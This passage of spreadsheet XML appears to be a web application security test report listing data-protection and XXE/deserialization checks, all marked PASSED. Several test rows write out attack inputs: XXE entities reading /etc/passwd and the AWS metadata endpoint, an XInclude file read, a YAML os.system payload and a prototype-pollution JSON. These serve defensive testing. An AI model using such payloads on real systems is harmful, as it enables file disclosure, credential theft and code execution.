        <is>
          <t>Backups encrypted with AES-256 before storage on cloud repository</t>
        </is>
      </c>
    </row>
    <row r="86" ht="22" customHeight="1">
      <c r="A86" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-015</t>
        </is>
      </c>
      <c r="B86" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C86" s="16" t="inlineStr">
        <is>
          <t>Client-Side Password Memory Leak Prevention</t>
        </is>
      </c>
      <c r="D86" s="16" t="inlineStr">
        <is>
          <t>Inspect browser DOM for residual password string after submission</t>
        </is>
      </c>
      <c r="E86" s="16" t="inlineStr">
        <is>
          <t>DOM inspector check</t>
        </is>
      </c>
      <c r="F86" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G86" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H86" s="16" t="inlineStr">
        <is>
          <t>Form fields cleared immediately post-auth; Password variable scope terminated</t>
        </is>
      </c>
    </row>
    <row r="87" ht="22" customHeight="1">
      <c r="A87" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-016</t>
        </is>
      </c>
      <c r="B87" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C87" s="16" t="inlineStr">
        <is>
          <t>SSL Certificate Chain &amp; Expiry Verification</t>
        </is>
      </c>
      <c r="D87" s="16" t="inlineStr">
        <is>
          <t>Validate SSL certificate validity and issuer chain</t>
        </is>
      </c>
      <c r="E87" s="16" t="inlineStr">
        <is>
          <t>SSL cert check</t>
        </is>
      </c>
      <c r="F87" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G87" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H87" s="16" t="inlineStr">
        <is>
          <t>Valid SSL certificate issued by trusted CA; Auto-renewal active (&gt; 30 days remaining)</t>
        </is>
      </c>
    </row>
    <row r="88" ht="22" customHeight="1">
      <c r="A88" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-017</t>
        </is>
      </c>
      <c r="B88" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C88" s="16" t="inlineStr">
        <is>
          <t>Cache-Control Headers on Sensitive Endpoints</t>
        </is>
      </c>
      <c r="D88" s="16" t="inlineStr">
        <is>
          <t>Inspect response headers on /api/user/profile</t>
        </is>
      </c>
      <c r="E88" s="16" t="inlineStr">
        <is>
          <t>Cache header audit</t>
        </is>
      </c>
      <c r="F88" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G88" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H88" s="16" t="inlineStr">
        <is>
          <t>Cache-Control: no-store, no-cache, must-revalidate, private set</t>
        </is>
      </c>
    </row>
    <row r="89" ht="22" customHeight="1">
      <c r="A89" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-018</t>
        </is>
      </c>
      <c r="B89" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C89" s="16" t="inlineStr">
        <is>
          <t>Cleartext Protocol Port Disablement</t>
        </is>
      </c>
      <c r="D89" s="16" t="inlineStr">
        <is>
          <t>Scan open server ports (Telnet 23, FTP 21, HTTP 80)</t>
        </is>
      </c>
      <c r="E89" s="16" t="inlineStr">
        <is>
          <t>Port scan check</t>
        </is>
      </c>
      <c r="F89" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G89" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H89" s="16" t="inlineStr">
        <is>
          <t>Unencrypted service ports closed; Port 80 automatically redirects to 443</t>
        </is>
      </c>
    </row>
    <row r="90" ht="22" customHeight="1">
      <c r="A90" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-019</t>
        </is>
      </c>
      <c r="B90" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C90" s="16" t="inlineStr">
        <is>
          <t>Server Banner Information Disclosure Suppression</t>
        </is>
      </c>
      <c r="D90" s="16" t="inlineStr">
        <is>
          <t>Inspect HTTP response headers for Server and X-Powered-By</t>
        </is>
      </c>
      <c r="E90" s="16" t="inlineStr">
        <is>
          <t>HTTP header disclosure check</t>
        </is>
      </c>
      <c r="F90" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G90" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H90" s="16" t="inlineStr">
        <is>
          <t>Server header masked; X-Powered-By header removed via Helmet middleware</t>
        </is>
      </c>
    </row>
    <row r="91" ht="22" customHeight="1">
      <c r="A91" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-020</t>
        </is>
      </c>
      <c r="B91" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C91" s="16" t="inlineStr">
        <is>
          <t>Browser Autocomplete on Sensitive Inputs</t>
        </is>
      </c>
      <c r="D91" s="16" t="inlineStr">
        <is>
          <t>Inspect HTML input attributes on credit card &amp; password fields</t>
        </is>
      </c>
      <c r="E91" s="16" t="inlineStr">
        <is>
          <t>HTML attribute audit</t>
        </is>
      </c>
      <c r="F91" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G91" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H91" s="16" t="inlineStr">
        <is>
          <t>autocomplete='off' or autocomplete='new-password' configured</t>
        </is>
      </c>
    </row>
    <row r="92" ht="22" customHeight="1">
      <c r="A92" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-021</t>
        </is>
      </c>
      <c r="B92" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C92" s="16" t="inlineStr">
        <is>
          <t>Internal IP Address Leak Prevention</t>
        </is>
      </c>
      <c r="D92" s="16" t="inlineStr">
        <is>
          <t>Inspect API headers and error logs for internal 10.x / 192.168.x IPs</t>
        </is>
      </c>
      <c r="E92" s="16" t="inlineStr">
        <is>
          <t>Internal IP leak check</t>
        </is>
      </c>
      <c r="F92" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G92" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H92" s="16" t="inlineStr">
        <is>
          <t>Internal IP addresses sanitized; Only public hostname / gateway exposed</t>
        </is>
      </c>
    </row>
    <row r="93" ht="22" customHeight="1">
      <c r="A93" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-022</t>
        </is>
      </c>
      <c r="B93" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C93" s="16" t="inlineStr">
        <is>
          <t>Session Token Exposure in URL Query Strings</t>
        </is>
      </c>
      <c r="D93" s="16" t="inlineStr">
        <is>
          <t>Inspect browser location history after navigating authenticated routes</t>
        </is>
      </c>
      <c r="E93" s="16" t="inlineStr">
        <is>
          <t>URL payload check</t>
        </is>
      </c>
      <c r="F93" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G93" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H93" s="16" t="inlineStr">
        <is>
          <t>Tokens passed exclusively via HTTP headers / cookies; Absent in URL params</t>
        </is>
      </c>
    </row>
    <row r="94" ht="22" customHeight="1">
      <c r="A94" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-023</t>
        </is>
      </c>
      <c r="B94" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C94" s="16" t="inlineStr">
        <is>
          <t>Temporary File Insecure Storage Prevention</t>
        </is>
      </c>
      <c r="D94" s="16" t="inlineStr">
        <is>
          <t>Inspect temp upload directory /tmp permissions</t>
        </is>
      </c>
      <c r="E94" s="16" t="inlineStr">
        <is>
          <t>Temp dir permissions</t>
        </is>
      </c>
      <c r="F94" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G94" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H94" s="16" t="inlineStr">
        <is>
          <t>Temp files stored with 0600 permissions and deleted immediately post-process</t>
        </is>
      </c>
    </row>
    <row r="95" ht="22" customHeight="1">
      <c r="A95" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-024</t>
        </is>
      </c>
      <c r="B95" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C95" s="16" t="inlineStr">
        <is>
          <t>Cryptographic Salt Generation Security</t>
        </is>
      </c>
      <c r="D95" s="16" t="inlineStr">
        <is>
          <t>Inspect password hashing salt generation logic</t>
        </is>
      </c>
      <c r="E95" s="16" t="inlineStr">
        <is>
          <t>Bcrypt salt audit</t>
        </is>
      </c>
      <c r="F95" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G95" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H95" s="16" t="inlineStr">
        <is>
          <t>Unique random 128-bit salt generated per password hash</t>
        </is>
      </c>
    </row>
    <row r="96" ht="22" customHeight="1">
      <c r="A96" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-025</t>
        </is>
      </c>
      <c r="B96" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C96" s="16" t="inlineStr">
        <is>
          <t>Cryptographic Key Length Compliance Audit</t>
        </is>
      </c>
      <c r="D96" s="16" t="inlineStr">
        <is>
          <t>Inspect RSA/ECC key sizes in application certificates</t>
        </is>
      </c>
      <c r="E96" s="16" t="inlineStr">
        <is>
          <t>Key length audit</t>
        </is>
      </c>
      <c r="F96" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G96" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H96" s="16" t="inlineStr">
        <is>
          <t>RSA keys &gt;= 2048-bit; ECC keys &gt;= 256-bit; Meets NIST security guidelines</t>
        </is>
      </c>
    </row>
    <row r="97" ht="22" customHeight="1">
      <c r="A97" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-026</t>
        </is>
      </c>
      <c r="B97" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C97" s="16" t="inlineStr">
        <is>
          <t>Robots.txt Sensitive Endpoint Exposure Audit</t>
        </is>
      </c>
      <c r="D97" s="16" t="inlineStr">
        <is>
          <t>Inspect /robots.txt file contents</t>
        </is>
      </c>
      <c r="E97" s="16" t="inlineStr">
        <is>
          <t>Robots.txt inspection</t>
        </is>
      </c>
      <c r="F97" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G97" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H97" s="16" t="inlineStr">
        <is>
          <t>Robots.txt excludes sensitive administrative path disclosures</t>
        </is>
      </c>
    </row>
    <row r="98" ht="22" customHeight="1">
      <c r="A98" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-027</t>
        </is>
      </c>
      <c r="B98" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C98" s="16" t="inlineStr">
        <is>
          <t>Source Map Production Exposure Check</t>
        </is>
      </c>
      <c r="D98" s="16" t="inlineStr">
        <is>
          <t>Request JS bundle source maps (.js.map) in production build</t>
        </is>
      </c>
      <c r="E98" s="16" t="inlineStr">
        <is>
          <t>Source map request</t>
        </is>
      </c>
      <c r="F98" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G98" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H98" s="16" t="inlineStr">
        <is>
          <t>Production build strips inline source maps; Source map files unlisted</t>
        </is>
      </c>
    </row>
    <row r="99" ht="22" customHeight="1">
      <c r="A99" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-028</t>
        </is>
      </c>
      <c r="B99" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C99" s="16" t="inlineStr">
        <is>
          <t>Export File PII Protection</t>
        </is>
      </c>
      <c r="D99" s="16" t="inlineStr">
        <is>
          <t>Generate Excel/CSV data export and inspect contained fields</t>
        </is>
      </c>
      <c r="E99" s="16" t="inlineStr">
        <is>
          <t>Data export check</t>
        </is>
      </c>
      <c r="F99" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G99" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H99" s="16" t="inlineStr">
        <is>
          <t>Export datasets scoped to user permissions; Excludes ungranted organization PII</t>
        </is>
      </c>
    </row>
    <row r="100" ht="22" customHeight="1">
      <c r="A100" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-029</t>
        </is>
      </c>
      <c r="B100" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C100" s="16" t="inlineStr">
        <is>
          <t>Software Version Disclosure via Endpoint Headers</t>
        </is>
      </c>
      <c r="D100" s="16" t="inlineStr">
        <is>
          <t>Send malformed request to API gateway</t>
        </is>
      </c>
      <c r="E100" s="16" t="inlineStr">
        <is>
          <t>Gateway header check</t>
        </is>
      </c>
      <c r="F100" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G100" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H100" s="16" t="inlineStr">
        <is>
          <t>Proxy software version masked (e.g. nginx / envoy version hidden)</t>
        </is>
      </c>
    </row>
    <row r="101" ht="22" customHeight="1">
      <c r="A101" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-030</t>
        </is>
      </c>
      <c r="B101" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C101" s="16" t="inlineStr">
        <is>
          <t>Local Storage Sensitive Data Cleansing on Logout</t>
        </is>
      </c>
      <c r="D101" s="16" t="inlineStr">
        <is>
          <t>Call logout function and inspect sessionStorage and localStorage</t>
        </is>
      </c>
      <c r="E101" s="16" t="inlineStr">
        <is>
          <t>Storage audit post-logout</t>
        </is>
      </c>
      <c r="F101" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G101" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H101" s="16" t="inlineStr">
        <is>
          <t>All authentication tokens, user metadata, and cached PII purged</t>
        </is>
      </c>
    </row>
    <row r="102" ht="22" customHeight="1">
      <c r="A102" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-001</t>
        </is>
      </c>
      <c r="B102" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C102" s="16" t="inlineStr">
        <is>
          <t>XXE File Disclosure Attack Prevention</t>
        </is>
      </c>
      <c r="D102" s="16" t="inlineStr">
        <is>
          <t>Upload XML document containing &lt;!ENTITY xxe SYSTEM 'file:///etc/passwd'&gt;</t>
        </is>
      </c>
      <c r="E102" s="16" t="inlineStr">
        <is>
          <t>XXE Local File Entity</t>
        </is>
      </c>
      <c r="F102" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G102" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H102" s="16" t="inlineStr">
        <is>
          <t>XML parser disallows inline DTD declarations; 400 Bad Request returned</t>
        </is>
      </c>
    </row>
    <row r="103" ht="22" customHeight="1">
      <c r="A103" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-002</t>
        </is>
      </c>
      <c r="B103" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C103" s="16" t="inlineStr">
        <is>
          <t>XXE Server-Side Request Forgery (SSRF) Attack</t>
        </is>
      </c>
      <c r="D103" s="16" t="inlineStr">
        <is>
          <t>Upload XML payload containing &lt;!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/'&gt;</t>
        </is>
      </c>
      <c r="E103" s="16" t="inlineStr">
        <is>
          <t>XXE AWS Metadata SSRF</t>
        </is>
      </c>
      <c r="F103" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G103" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H103" s="16" t="inlineStr">
        <is>
          <t>External entity resolution disabled; Cloud metadata inaccessible</t>
        </is>
      </c>
    </row>
    <row r="104" ht="22" customHeight="1">
      <c r="A104" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-003</t>
        </is>
      </c>
      <c r="B104" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C104" s="16" t="inlineStr">
        <is>
          <t>XXE Billion Laughs DoS Protection</t>
        </is>
      </c>
      <c r="D104" s="16" t="inlineStr">
        <is>
          <t>Upload XML containing nested exponential entity expansion (Billion Laughs)</t>
        </is>
      </c>
      <c r="E104" s="16" t="inlineStr">
        <is>
          <t>Nested XML entity payload</t>
        </is>
      </c>
      <c r="F104" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G104" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H104" s="16" t="inlineStr">
        <is>
          <t>Entity expansion limit enforced (max 100); DoS attack mitigated</t>
        </is>
      </c>
    </row>
    <row r="105" ht="22" customHeight="1">
      <c r="A105" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-004</t>
        </is>
      </c>
      <c r="B105" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C105" s="16" t="inlineStr">
        <is>
          <t>XXE Out-Of-Band (OOB) Exfiltration Prevention</t>
        </is>
      </c>
      <c r="D105" s="16" t="inlineStr">
        <is>
          <t>Inject XML payload forcing DNS lookup to attacker server</t>
        </is>
      </c>
      <c r="E105" s="16" t="inlineStr">
        <is>
          <t>OOB DNS exfiltration payload</t>
        </is>
      </c>
      <c r="F105" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G105" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H105" s="16" t="inlineStr">
        <is>
          <t>Outbound network requests from XML parser blocked by firewall policy</t>
        </is>
      </c>
    </row>
    <row r="106" ht="22" customHeight="1">
      <c r="A106" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-005</t>
        </is>
      </c>
      <c r="B106" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C106" s="16" t="inlineStr">
        <is>
          <t>Insecure Node.js Deserialization Attack</t>
        </is>
      </c>
      <c r="D106" s="16" t="inlineStr">
        <is>
          <t>Send serialized JS object payload containing eval() or exec()</t>
        </is>
      </c>
      <c r="E106" s="16" t="inlineStr">
        <is>
          <t>node-serialize exploit payload</t>
        </is>
      </c>
      <c r="F106" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G106" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H106" s="16" t="inlineStr">
        <is>
          <t>Unsafe deserialization functions avoided; JSON.parse strictly used</t>
        </is>
      </c>
    </row>
    <row r="107" ht="22" customHeight="1">
      <c r="A107" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-006</t>
        </is>
      </c>
      <c r="B107" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C107" s="16" t="inlineStr">
        <is>
          <t>Python Pickle Deserialization Remote Code Execution</t>
        </is>
      </c>
      <c r="D107" s="16" t="inlineStr">
        <is>
          <t>Pass malicious pickled payload to Python backend worker</t>
        </is>
      </c>
      <c r="E107" s="16" t="inlineStr">
        <is>
          <t>Pickle RCE payload</t>
        </is>
      </c>
      <c r="F107" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G107" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H107" s="16" t="inlineStr">
        <is>
          <t>Pickle deserialization disabled; Safe JSON / Protocol Buffers used</t>
        </is>
      </c>
    </row>
    <row r="108" ht="22" customHeight="1">
      <c r="A108" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-007</t>
        </is>
      </c>
      <c r="B108" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C108" s="16" t="inlineStr">
        <is>
          <t>Java Object Deserialization RCE (ysoserial)</t>
        </is>
      </c>
      <c r="D108" s="16" t="inlineStr">
        <is>
          <t>Send serialized Java byte stream to backend endpoint</t>
        </is>
      </c>
      <c r="E108" s="16" t="inlineStr">
        <is>
          <t>Java Gadget Chain payload</t>
        </is>
      </c>
      <c r="F108" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G108" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H108" s="16" t="inlineStr">
        <is>
          <t>ObjectInputStream disabled; Safe JSON deserialization enforced</t>
        </is>
      </c>
    </row>
    <row r="109" ht="22" customHeight="1">
      <c r="A109" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-008</t>
        </is>
      </c>
      <c r="B109" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C109" s="16" t="inlineStr">
        <is>
          <t>YAML Deserialization Code Execution Protection</t>
        </is>
      </c>
      <c r="D109" s="16" t="inlineStr">
        <is>
          <t>Send YAML input containing !!python/object/apply:os.system</t>
        </is>
      </c>
      <c r="E109" s="16" t="inlineStr">
        <is>
          <t>YAML RCE payload</t>
        </is>
      </c>
      <c r="F109" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G109" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H109" s="16" t="inlineStr">
        <is>
          <t>Uses yaml.safe_load() / SafeLoader; Code execution blocked</t>
        </is>
      </c>
    </row>
    <row r="110" ht="22" customHeight="1">
      <c r="A110" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-009</t>
        </is>
      </c>
      <c r="B110" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C110" s="16" t="inlineStr">
        <is>
          <t>XML Schema Validation (XSD) Enforcement</t>
        </is>
      </c>
      <c r="D110" s="16" t="inlineStr">
        <is>
          <t>Upload malformed XML not conforming to defined XSD schema</t>
        </is>
      </c>
      <c r="E110" s="16" t="inlineStr">
        <is>
          <t>Malformed XML structure</t>
        </is>
      </c>
      <c r="F110" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G110" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H110" s="16" t="inlineStr">
        <is>
          <t>Strict XSD validation rejects non-conforming XML structures</t>
        </is>
      </c>
    </row>
    <row r="111" ht="22" customHeight="1">
      <c r="A111" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-010</t>
        </is>
      </c>
      <c r="B111" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C111" s="16" t="inlineStr">
        <is>
          <t>JSON Schema Injection / Structure Pollution</t>
        </is>
      </c>
      <c r="D111" s="16" t="inlineStr">
        <is>
          <t>Send JSON containing duplicate keys or proto pollution properties</t>
        </is>
      </c>
      <c r="E111" s="16" t="inlineStr">
        <is>
          <t>{"__proto__": {"admin": true}}</t>
        </is>
      </c>
      <c r="F111" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G111" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H111" s="16" t="inlineStr">
        <is>
          <t>Object.prototype pollution blocked; Keys sanitized via frozen schema</t>
        </is>
      </c>
    </row>
    <row r="112" ht="22" customHeight="1">
      <c r="A112" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-011</t>
        </is>
      </c>
      <c r="B112" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C112" s="16" t="inlineStr">
        <is>
          <t>XML Bomb / Quad Bomb Compression Protection</t>
        </is>
      </c>
      <c r="D112" s="16" t="inlineStr">
        <is>
          <t>Upload gzipped XML file designed to expand to 10GB</t>
        </is>
      </c>
      <c r="E112" s="16" t="inlineStr">
        <is>
          <t>Decompression bomb</t>
        </is>
      </c>
      <c r="F112" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G112" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H112" s="16" t="inlineStr">
        <is>
          <t>Decompression stream size capped at 10MB; Process aborted</t>
        </is>
      </c>
    </row>
    <row r="113" ht="22" customHeight="1">
      <c r="A113" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-012</t>
        </is>
      </c>
      <c r="B113" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C113" s="16" t="inlineStr">
        <is>
          <t>SOAP Service Security &amp; DTD Disablement</t>
        </is>
      </c>
      <c r="D113" s="16" t="inlineStr">
        <is>
          <t>Send SOAP request containing external DTD reference</t>
        </is>
      </c>
      <c r="E113" s="16" t="inlineStr">
        <is>
          <t>SOAP XXE payload</t>
        </is>
      </c>
      <c r="F113" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G113" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H113" s="16" t="inlineStr">
        <is>
          <t>SOAP engine config disables external DTD processing</t>
        </is>
      </c>
    </row>
    <row r="114" ht="22" customHeight="1">
      <c r="A114" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-013</t>
        </is>
      </c>
      <c r="B114" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C114" s="16" t="inlineStr">
        <is>
          <t>XInclude Attack Prevention in XML Processors</t>
        </is>
      </c>
      <c r="D114" s="16" t="inlineStr">
        <is>
          <t>Inject &lt;xi:include href='file:///etc/passwd'/&gt; into XML input</t>
        </is>
      </c>
      <c r="E114" s="16" t="inlineStr">
        <is>
          <t>XInclude injection payload</t>
        </is>
      </c>
      <c r="F114" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G114" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H114" s="16" t="inlineStr">
        <is>
          <t>XInclude processing disabled in XML parser settings</t>
        </is>
      </c>
    </row>
    <row r="115" ht="22" customHeight="1">
      <c r="A115" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-014</t>
        </is>
      </c>
      <c r="B115" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C115" s="16" t="inlineStr">
        <is>
          <t>SVG Image Upload XXE Vulnerability Check</t>
        </is>
      </c>
      <c r="D115" s="16" t="inlineStr">
        <is>
          <t>Upload SVG image containing embedded XML external entity</t>
        </is>
      </c>
      <c r="E115" s="16" t="inlineStr">
        <is>
          <t>SVG XXE payload</t>
        </is>
      </c>
      <c r="F115" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G115" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H115" s="16" t="inlineStr">
        <is>
          <t>SVG sanitized using DOMPurify / ImageMagick rasterization before storage</t>
        </is>
      </c>
    </row>
    <row r="116" ht="22" customHeight="1">
      <c r="A116" s="15" t="inlineStr">
        <is>
          <t>SEC-XXE-015</t>
        </is>
      </c>
      <c r="B116" s="16" t="inlineStr">
        <is>
          <t>XXE &amp; Deserialization Security</t>
        </is>
      </c>
      <c r="C116" s="16" t="inlineStr">
        <is>
          <t>PDF Generation Template Injection Prevention</t>
        </is>
      </c>
      <c r="D116" s="16" t="inlineStr">
        <is>
          <t>Inject malicious HTML/XML into PDF generator template</t>
        </is>
      </c>
      <c r="E116" s="16" t="inlineStr">
        <is>
          <t>PDF template injection</t>
        </is>
      </c>
      <c r="F116" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G116" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H116" s="16" t="inlineStr">
        <is>
          <t>HTML template inputs escaped; Local file access disabled in PDF renderer</t>
        </is>
      </c>
    </row>
    <row r="117" ht="22" customHeight="1">
      <c r="A117" s="15" t="inlineStr">
        <is>
